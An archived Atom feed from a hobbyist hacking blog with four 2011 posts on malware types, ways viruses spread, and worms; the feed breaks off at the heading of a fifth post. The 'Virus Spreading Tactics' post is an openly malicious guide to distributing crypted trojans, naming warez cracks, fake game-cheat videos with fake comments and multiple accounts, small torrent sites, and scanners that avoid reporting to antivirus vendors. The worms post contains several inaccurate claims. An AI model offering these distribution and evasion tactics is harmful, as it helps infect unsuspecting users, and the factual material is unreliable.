<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" gd:etag="W/&quot;CUMBSHo7eyp7ImA9WhRaFE0.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676</id><updated>2012-02-16T20:14:19.403+05:30</updated><category term="Mobile" /><category term="Triple Booting" /><category term="Spying" /><category term="Indian Government" /><category term="system hacking" /><category term="Internet" /><category term="Password Sniffing" /><category term="Wi Fi" /><category term="Backtrack" /><category term="Mozilla" /><category term="Networking" /><category term="Hacker's News" /><category term="EBooks" /><category term="windows" /><category term="Keyloggers" /><category term="Spreading" /><category term="Ubuntu" /><category term="Android" /><category term="Facebook" /><category term="Latest News" /><category term="Google" /><category term="Announcements" /><category term="USB" /><category term="web security" /><title>Jaguar Geek's Blog</title><subtitle type="html" /><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" 
src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>44</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/jaguargeek" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="jaguargeek" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">jaguargeek</feedburner:emailServiceId><feedburner:feedburnerHostname xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">http://feedburner.google.com</feedburner:feedburnerHostname><entry gd:etag="W/&quot;AkUAQnc-fCp7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-7139821094214109194</id><published>2011-09-10T23:40:00.002+05:30</published><updated>2011-09-10T23:40:43.954+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:40:43.954+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Spreading" /><category scheme="http://www.blogger.com/atom/ns#" term="Spying" /><title>Differnt Types Of Malware</title><content type="html">Different Types Of Malware&lt;br /&gt;
&lt;br /&gt;
Nowadays when people hear the word virus they think keylogger or RAT (remote administration tool), but viruses/malware go a lot more in depth than most people think.&lt;br /&gt;
&lt;br /&gt;
The main types I will be going over are:&lt;br /&gt;
&lt;br /&gt;
* Worms&lt;br /&gt;
* Trojan Horses (RAT)&lt;br /&gt;
* Logic Bombs&lt;br /&gt;
* Adware &amp;amp; Spyware&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Worms&lt;br /&gt;
A worm is a program that can spread full copies or smaller versions of itself all over the hard drive, over network shares to other computers, and even use your own email to send itself to everyone in your contacts. It will either replace all your files with itself or just keep spreading until your hard drive has no more space left on it. One famous worm was "ILOVEYOU":&lt;br /&gt;
&lt;a href="http://en.wikipedia.org/wiki/ILOVEYOU" target="_blank" title="autolink"&gt;http://en.wikipedia.org/wiki/ILOVEYOU&lt;/a&gt;&lt;br /&gt;
How Do I Know If I'm Infected?&lt;br /&gt;
With worms it's pretty self-evident, because you will notice either tons of junk files showing up or your hard drive space getting lower and lower; how fast it eats through your HD depends on the type of worm.&lt;br /&gt;
&lt;br /&gt;
Trojan Horses&lt;br /&gt;
Trojan horses go by many names: RATs, remote admin tools, and the list is almost endless. Trojan horses are called remote administration tools because that is exactly what they are: they allow attackers to access and control the infected computer from their own. When run, RATs usually create another copy of themselves somewhere on the victim's computer so that the slave can delete the original file and be none the wiser. One way to check for trojans is to check your "Start Up" (msconfig) or perform a portscan on your localhost.&lt;br /&gt;
How Do I Know If I'm Infected?&lt;br /&gt;
Some signs that you're infected with a trojan are that your antivirus/firewall could be disabled, or random events such as your wallpaper changing, random mouse movements, or files being deleted without your knowledge.&lt;br /&gt;
&lt;br /&gt;
Logic Bombs&lt;br /&gt;
You don't really hear much about logic bombs anymore because they're not that widely used. But just a little something about them. Logic bombs are highly destructive and can range from changing bytes of data on the HD to making the entire HD unreadable. Logic bombs are most commonly installed by insiders with access to the system. For example, in 2008 an insider attempted to load a logic bomb with a timer onto a computer system at the Federal National Mortgage Association but was unsuccessful and was arrested.&lt;br /&gt;
How Do I Know If I'm Infected?&lt;br /&gt;
At first you may have no idea, because most logic bombs have timers to execute hours, days, weeks, or months after file execution. But after it executes, as with a worm, it will be self-evident; unlike the worm filling space, you will notice a loss of data on the HD.&lt;br /&gt;
&lt;br /&gt;
Adware &amp;amp; Spyware&lt;br /&gt;
Have you ever downloaded a program you thought was safe but all it did was give you popups? That's typical adware. Adware is advertising software; most of the time it isn't a high security risk like the above. Most spyware is included with adware. Spyware is more dangerous than adware because it "mines" data such as browsing history, emails, and sometimes credit card numbers, and either uses it for marketing or sells it to other companies.&lt;br /&gt;
How Do I Know If I'm Infected?&lt;br /&gt;
Adware is pretty obvious because you will get popups and stuff like that, but spyware is a lot harder to notice sometimes.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-7139821094214109194?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=rGnOuhm101o:HBwToPbllvc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=rGnOuhm101o:HBwToPbllvc:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?i=rGnOuhm101o:HBwToPbllvc:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=rGnOuhm101o:HBwToPbllvc:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=rGnOuhm101o:HBwToPbllvc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/7139821094214109194/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/differnt-types-of-malware.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/7139821094214109194?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/7139821094214109194?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/differnt-types-of-malware.html" title="Differnt Types Of Malware" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;AkYDSXo9eCp7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-8109118062343204047</id><published>2011-09-10T23:39:00.002+05:30</published><updated>2011-09-10T23:39:38.460+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:39:38.460+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Spreading" /><category scheme="http://www.blogger.com/atom/ns#" term="Spying" /><title>Virus spreading II</title><content type="html">How to distribute viruses:&lt;br /&gt;
&lt;br /&gt;
So I saw an article here on how to distribute viruses, Botnets and RATs.  It seemed quite short and unfinished so I will try to finish it.&lt;br /&gt;
&lt;br /&gt;
My history with viruses and Botnets is quite vast. I've been jumping between viruses for a while, going around the net meeting many different virus writers and learning a lot about what makes a good writer and what makes a good distributor. A good writer rarely sends out his own work himself; instead he might hand it over to another person to send out to the world. I know that seems a bit weird but it's true, people would work in teams to write, distribute, monitor and maintain.&lt;br /&gt;
&lt;br /&gt;
So it's time to get started with this.&lt;br /&gt;
&lt;br /&gt;
1. Warez&lt;br /&gt;
&lt;br /&gt;
If you have read the first article you will know that a warez site is  mainly for downloading cracked programs that would normally cost a  fortune like AVG and Norton. However, these sites aren't as great as you  might think. Most of these programs however contain a surprise that  might cause upset to the downloader. Warez sites are the breeding ground  for new viruses. Viruses can be bound to a program and when you set it  up you could get an awful kick in the teeth. There are people who are  willing to open up a program and setup a virus inside the program itself  making it much harder to find. These people are usually part of a group  of serious attackers. You could be in some serious s**t  if you get hit  by one of these.&lt;br /&gt;
&lt;br /&gt;
2. Spam, spam everywhere&lt;br /&gt;
&lt;br /&gt;
We all hate spam; it's a tangy kind of meat that doesn't hold a candle  to ham. :D But really, who likes spam? Well, viruses love them. We all  get spam every day, and most of it is just pure rubbish. They want us to  go to some site and enter details, or to reply to the prince of Nigeria  saying thanks but no thanks. We all know that viruses are in emails -  almost all emails, whether they have an attachment or not. So the emails  say beware of an upcoming virus that is going to spread all over the  internet, is going to destroy the world, and will rape all the kids in  your neighborhood, and that YOU are going to get the blame! Yep, spam is  great for viruses, scareware, freeware, shareware; it's all the same!  Spam is there to get you to read a dodgy PDF file that just exploits  your OS, or to get you to visit a dodgy site that claims to know how  Michael Jackson really died (you should really click that email, it's  true).&lt;br /&gt;
&lt;br /&gt;
3. IM and IRC&lt;br /&gt;
&lt;br /&gt;
Instant messaging and IRC are great ways to meet people and talk to  friends. But it only takes one idiot to get infected and to screw up  everyone else.&lt;br /&gt;
&lt;br /&gt;
The MSN bug...&lt;br /&gt;
The MSN bug is very annoying. Anyone who has more than ten contacts on it has faced it. Your friend says something along the lines of, "Hey LOL whats up? I just found this great new site &lt;a href="http://www.istickthingsinmyarse.com/" target="_blank" title="autolink"&gt;www.istickthingsinmyarse.com&lt;/a&gt; YOU SHOULD SO CHECK IT OUT LOL!!!!!!!!!!!" Then you see that your friend is offline, send them a text asking if they are online and they say no. Well now you know that your friend got suckered into clicking something stupid. We aren't really sure what the point of the virus was. It was thought that it was a botnet, but this is too big and too quiet to be a botnet.&lt;br /&gt;
&lt;br /&gt;
IRC Worms...&lt;br /&gt;
IRC worms aren't as big or as common, but they do crop up and are worth a  mention. IRC worms in the underbelly of the IRC are very dangerous when  you can get smacked with one. You might go into an IRC you don't know,  and the admin might say that he has to update the Client you are using  to match the server. Now you and I both know that you would have to be  an IRC n00b to believe this. But people are that stupid. Once these  people get infected then they are at the mercy of the worm. Yep, it's  kind of hard to believe that people are willing to accept something  through IRC that they don't know what exactly it is.&lt;br /&gt;
&lt;br /&gt;
4.  People&lt;br /&gt;
&lt;br /&gt;
People are willing to do many things to get you to download their virus  or to get on their botnets. They will lie to you, entice you, seduce you  - anything. These people will either be just harmless pranksters or  serious groups of attackers that want to really get a lot out of you by  any means. These are the people that are the front-end of the virus  industry, and they are the ones that are pushing the virus. Like drug  dealers on the street, they get caught, then get in trouble, small time  stuff. They are the fall guys for the bigger gangs; they usually get a  one time payment and are cut off once they get caught.&lt;br /&gt;
&lt;br /&gt;
5. Hardware&lt;br /&gt;
&lt;br /&gt;
Have you ever found a lost USB key? Ever think of looking at what's inside? You might find something unpleasant inside. There are people who will "lose" their USB key and want it to be found. Once you put it in, you might just get smacked in the face with a virus. Yeah, it's one of the new ways that is taking the world. Open up a MyUsb.pdf file and then this could get very messy. It could scan your documents, pictures, downloads, anything - and then send it on to an FTP server in some country such as Russia, and then simply delete itself. These viruses have to be fast, effective, and leave no trace. These high tech viruses are the latest in gathering information. But they are much more than just random attacks. They are being targeted at businesses and large companies - trojans that slam a system or that leave a backdoor for the attacker to get in for further use.&lt;br /&gt;
&lt;br /&gt;
6. Torrents&lt;br /&gt;
&lt;br /&gt;
Lastly, we have torrents. Torrents are open to the public to FREELY  DOWNLOAD ITEMS THAT USERS HAVE UPLOADED! That had to be said since this  is a very dangerous area. DON'T DOWNLOAD THINGS THAT AREN'T BY TRUSTED  USERS!!!!!!! This section I will leave short since I have mentioned  already most of which is said in the Warez section.&lt;br /&gt;
&lt;br /&gt;
7. Random downloads&lt;br /&gt;
&lt;br /&gt;
IF YOU DO THIS, YOU DESERVE WHAT YOU GET! THIS IS VERY STUPID AND SHOULD NOT BE DONE BY ANYONE THAT DOESN'T WANT TO RISK THEIR COMPUTER! IF YOU DO NOT KNOW WHAT YOU ARE DOWNLOADING THEN DON'T DOWNLOAD IT!&lt;br /&gt;
&lt;br /&gt;
This is a simple article with some ways that viruses are sent around. I  hope you liked it. I will be doing more articles if you like this one.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-8109118062343204047?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=lWRz8-vfkSs:6cvmksFHqiA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=lWRz8-vfkSs:6cvmksFHqiA:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?i=lWRz8-vfkSs:6cvmksFHqiA:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=lWRz8-vfkSs:6cvmksFHqiA:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=lWRz8-vfkSs:6cvmksFHqiA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/8109118062343204047/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/virus-spreading-ii.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/8109118062343204047?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/8109118062343204047?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/virus-spreading-ii.html" title="Virus spreading II" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;AkYFRns8fyp7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-5746920570593285023</id><published>2011-09-10T23:38:00.000+05:30</published><updated>2011-09-10T23:38:37.577+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:38:37.577+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Spreading" /><category scheme="http://www.blogger.com/atom/ns#" term="Spying" /><title>Virus Spreading Tactics</title><content type="html">Virus Spread Tutorial&lt;br /&gt;
&lt;br /&gt;
Hey all. This is my new tutorial about some of ways to spread your virus  and get more logs from stealer, Botnet(s), RAT connections and much  more.&lt;br /&gt;
&lt;br /&gt;
Tutorial is by me so if you post on some other websites,blogs,forums etc. please put credit on me, Om3n.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(1.) First of all the bust way what i suggest to others are warez sites.&lt;br /&gt;
&lt;br /&gt;
Whats Warez-Website?&lt;br /&gt;
&lt;br /&gt;
Warez is site where you can find free cracked expensive software like  AVG Internet Security, Kaspersky Internet Security 2008, Keyscrambler  but the best way to spread on that kind of website is to post something  which includes a crack that the user needs to run to crack the software  but ofc must work + crypted + binded Trojan. Also you can do that on  some stupid people to pind some videos, pictures or something that is  not .exe! Also the really important thing is to post colored  text,interesting images,virus scan (make sure it's novirusthanks.org or  some other what doesn't sent scan results to Antivirus companies) and  find some people to post fake comments like i do. Also when you spread  make sure you got few accounts not one, maybe 3-4.&lt;br /&gt;
&lt;br /&gt;
(2.) Second and really important thing is YouTube&lt;br /&gt;
&lt;br /&gt;
What's YouTube?&lt;br /&gt;
&lt;br /&gt;
Uhh everyone knows what YouTube is. It's a famous website where people  share their videos, ideas, and software, etc. There comes our part:  Thumb-sup. So what you have to do is to make new account. Don't put  anything in your username that would keep people from downloading it  such as "hacker". Make something stupid simple so that people think you  are a kid. That's the really important thing. Also like I said before,  get fake comments. That's really important too for spreading. Also, you  will need few accounts as I said before. I suggest one for some fake  programs (like some programs you make in C#,C++,VB.NET,VB6, for  explanation: WoW Gold Hack, Runescape Hack etc). A lot of people want to  be hackers so they will sure download these kinds of programs. I get  around 20 victims per day per account (so that's around 40-50 a day)  because of this. Also use GAME CHEATS. People love cheating so they will  surely download it. I make videos for games like CS 1.6, CS:S, COD4,  WoW etc. Make sure they works and they are crypted. This is really  important or you will lose your connections because when AV detect  Trojan they automatic block it and make your virus unusable (what you  don't want to happen of course). Next way is like on Warez website is to  use Cracks, good software, antiviruses etc.&lt;br /&gt;
&lt;br /&gt;
(3.) The next important part of spreading your virus are Torrent websites.&lt;br /&gt;
&lt;br /&gt;
What's a Torrent?&lt;br /&gt;
&lt;br /&gt;
On torrent sites, you can find anything, movies, pictures, wallpapers,  games, programs, etc. So that's good for us. But i don't really use  torrents for spreading viruses, although they are great. I don't have  time to upload big games, movies and things like that so i just use  YouTube and Warez. I suggest not to use big torrent sites like piratebay  because they send every file on virus scan to antivirus companies which  is really bad for you if you buy one FUD private crypter. You don't  want that to happen so just use some small Torrent websites.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
IMPORTANT: Never upload your crypted Trojans on rapidshare. The reason  because sometimes if you don't have premium account it will limit  downloads on 25 or maybe close your premium account ( what happened to  one guy i know ) SO NO RAPIDSHARE.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-5746920570593285023?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=sEwtZt5XaMs:VUxpJQQznJw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=sEwtZt5XaMs:VUxpJQQznJw:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?i=sEwtZt5XaMs:VUxpJQQznJw:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=sEwtZt5XaMs:VUxpJQQznJw:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=sEwtZt5XaMs:VUxpJQQznJw:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/5746920570593285023/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/virus-spreading-tactics.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/5746920570593285023?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/5746920570593285023?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/virus-spreading-tactics.html" title="Virus Spreading Tactics" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;AkcHQXc-fyp7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-711685766947929393</id><published>2011-09-10T23:37:00.000+05:30</published><updated>2011-09-10T23:37:10.957+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:37:10.957+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Spreading" /><category scheme="http://www.blogger.com/atom/ns#" term="Spying" /><title>Worms</title><content type="html">Worms&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
A computer worm is by definition self-replicating code that infects computers. Worms can be malicious or put to good use. They use a computer network to get from computer to computer. They can be made to send themselves through emails and other means that the user may not notice. Unlike viruses, worms do not need to attach to files to get onto computers.&lt;br /&gt;
Worms can attack computers to infect them using the latest exploits for that system. This is called a wormnet. This is where the original worm learns of a new exploit, whether by means of AI and Exploit-db[1] or by the original creator writing a new exploit into the worm and sending it out. Each worm will then copy the source of the worm it copied from so it can infect more computers. This method of high-level attack can keep a single worm going for many months.&lt;br /&gt;
The difference between worms and viruses is that viruses are there to cause harm on purpose. They can modify or corrupt the system. Worms, however, can cause harm to the network, whether just by consuming bandwidth or by hooking computers onto botnets.&lt;br /&gt;
Payloads are extra bits of code that make the worm do more than just copy itself; they can cause harm to the victim, as ExploreZip did. This worm was sent by email to victims; when opened it would copy itself and modify WIN.INI so that it is started on reboot. It would then look for Outlook and send itself to everyone in the mail contacts. Other payloads would encrypt a user's files and then display a pop-up asking the user to pay money to unlock their content or it would be deleted. This is called ransomware, which a few worms have carried.&lt;br /&gt;
Some payload-free worms like the Morris worm and MyDoom didn't cause any actual damage but can cause network trouble.&lt;br /&gt;
Other payloads are ones like backdoors, keyloggers and RATs (Remote Admin Tools). A backdoor is when a system can be accessed again without the need for hacking, as the system has already been attacked. Backdoors are usually shells that stay open for the attacker to use. Keyloggers are scripts that can capture what keys are pressed. They can send reports live to the attacker as the user types, or the reports can be sent to an FTP server when the victim is offline or the attacker is offline. The FTP server needs a username and password. The issue with this is that if this code isn't obfuscated, then if the worm is found and the source opened, the attacker may get caught.&lt;br /&gt;
A RAT is a program that connects the victim to the attacker. Some advanced RATs can allow the attacker to use the camera, microphone and the on-screen keyboard. Most let you use a keylogger and several other tools. The best known RAT is DarkComet, which can be tied to a worm to make it very, very dangerous.&lt;br /&gt;
Not all worms are bad though. There are worms that infect computers to patch them. I would make a Windows updater joke here but that's too obvious. These worms use user-made patches for computers. Some, like the Nachi family of worms, for example, tried to download and install patches from Microsoft's website to fix vulnerabilities in the host system by exploiting those same vulnerabilities. These worms continued to infect and clean and so on until they hit a dead end and deleted themselves. However, these worms would work without the user's consent and would reboot the computer when the update was complete.&lt;br /&gt;
Worms can now spread through many other means, such as through social sites like Facebook by means of clickjacking and LikeJacking sessions. These encourage the victim to do something without their knowledge, editing account info or visiting a site via iframe which can infect them.&lt;br /&gt;
Protecting from worms can be easy unless the bad guys have the upper hand. Zero-day exploits are exploits that there is no patch for at the moment. These can be very dangerous and could take some time to get to the surface for the company to start fixing. Keep your system updated and keep an eye on what needs urgent updates, such as Java. Flash as well as Java needs to be monitored and kept up to date to protect your system from attack.&lt;br /&gt;
My personal favourite worm is the Blaster Worm, which was written back in 2003 by a team of Chinese hackers and used to infect American computers. This worm infects the victim and then says it will shut down the computer in 60 seconds. If the user cannot react quickly enough to kill this process then the computer will shut down and reboot over and over. This worm would do one of a few things to infect other computers before shutting down. It would look for Outlook and use that to send itself to others. It would try to hijack an email session cookie for Hotmail or Yahoo. It would try to infect, via port scanning, the computers it was in contact with and try to attack them, whether over a Wi-Fi or wired connection.&lt;br /&gt;
Well known worms like the Conficker worm in my opinion got way too much press for what they did. There are several versions of the worm, and what was not told to the public was that users who were not infected with Conficker.A-D were not going to get infected with Conficker.E. This lack of information caused global panic and let companies like Symantec run rampant claiming that it was from Russia, it was from the UK, it accused people of writing it, they never found the person, they just proved that they are full of crap and know nothing on anything security as they can't even do their jobs right.&lt;br /&gt;
The Conficker worm did very little: it blocked users from running some programs that would give it away. It killed processes; an error in the code of Conficker.B let the worm kill itself and try to restart itself while it killed itself, causing infected computers to overclock after an hour or so of this. This error was fixed in Conficker.C. It also stopped the victim from looking up certain words, phrases, sites or IP ranges. The worm also opened up the limit on how much data could be sent on the network. The Conficker family is classed as severe, which is quite strange as it does no real long-term damage and has a simple fix. This is very strange as no other worm is classed as severe without doing real damage to the computer. This is proof that media can seriously make things worse when they go talking about stuff they don't know about.&lt;br /&gt;
Media and worms go about as well together as gas and fire do. When they come together things just blow up and get out of hand. Lacking understanding, they are there to report a new unholy worm that will eat your memory and email your porn to your grandmother, when it will do what Conficker does: very little. People are reporting on these new worms before experts can even dissect the matter. It's all rush in, get some small detail, blow it to all hell and scare half the internet offline. Also, the companies relied on, like Symantec, AVG and Kaspersky, have bad track records of keeping things quiet and of bad monitoring, as they are more focused on profit instead of just trying to catch and stop the worms and viruses.&lt;br /&gt;
This sort of behavior has allowed the bad guys to get the upper hand with new ways of encrypting their methods of attack and moving faster than any company can keep up.&lt;br /&gt;
This is a worm race between who can get which worm out fastest to the worm using whatever exploit they can. And an endless fight between which language is dominant, C++ or Perl, in worm creation.&lt;br /&gt;
So all in all the worm is a fascinating piece of work, a masterpiece of coding which uses the most up to date attacks and is second to none in the world of infections.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-711685766947929393?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/711685766947929393/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/worms.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/711685766947929393?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/711685766947929393?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/worms.html" title="Worms" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DUQMRnc5fyp7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-7707361972811343646</id><published>2011-09-10T23:26:00.000+05:30</published><updated>2011-09-10T23:26:27.927+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:26:27.927+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="windows" /><title>Top 10 Windows Tools</title><content type="html">&lt;center&gt;&lt;strong&gt;&lt;u&gt;Top 10 Windows Tools&lt;/u&gt;&lt;/strong&gt;&lt;/center&gt;&lt;br /&gt;
